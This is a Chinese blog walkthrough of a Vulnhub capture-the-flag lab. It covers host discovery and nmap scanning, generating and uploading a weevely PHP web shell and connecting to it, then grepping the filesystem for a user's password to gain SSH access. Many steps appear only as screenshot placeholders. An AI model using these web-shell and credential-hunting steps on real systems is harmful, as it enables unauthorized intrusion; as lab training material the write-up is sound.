带妹玩转Vulnhub【六】

前言

今晚的第二篇,没有什么要讲的,让我们好好的来排练一遍。

开始

主机发现

netdiscover -r 192.168.43.0/24

带妹玩转Vulnhub【六】_第1张图片

端口扫描

nmap -A -p- -T4 192.168.43.132

带妹玩转Vulnhub【六】_第2张图片

渗透测试

带妹玩转Vulnhub【六】_第3张图片

一个登陆页面,目录扫描肯定还有些东西

带妹玩转Vulnhub【六】_第4张图片

很快我们便可以得到第一个flag

带妹玩转Vulnhub【六】_第5张图片

以及一些关键的信息

带妹玩转Vulnhub【六】_第6张图片

当我开始尝试访问http://192.168.43.132/uploaded_files/时一直无法加载出页面,可能是需要我们登陆之后才能进行文件上传。

带妹玩转Vulnhub【六】_第7张图片

这里需要用到kali上的一个工具weevely,参考链接

如下命令weevely generate shell /root/shell.php
然后访问http://192.168.43.132/uploaded_files/shell.php
没有任何提示,说明此是shell.php已经成功上传,并且我也进行了访问
使用weevely进行连接
weevely http://192.168.43.132/uploaded_files/shell.php shell

带妹玩转Vulnhub【六】_第8张图片

进入shell之后,我们需要相办法获取root,可以看到一波提示

带妹玩转Vulnhub【六】_第9张图片

在这里插入图片描述

使用如下命令grep -rns technawi /对全部文件内容进行搜索,注意看一下帮助文档,会有参数的详细解释。

进行全局搜索确实是太耗时间了,这里就不截图了

带妹玩转Vulnhub【六】_第10张图片

最后我们便得到了密码,接下来就是使用用户名和密码进行ssh登陆了,拿到最后一个flag

带妹玩转Vulnhub【六】_第11张图片

总结

这次呢,基本上也是一条主线下来,先获取web-shell,然后获取root的用户名和密码。

带妹是不可能带妹的,这辈子都不可能带妹的?
有人么?没人我要报警了?

你可能感兴趣的:(CTF)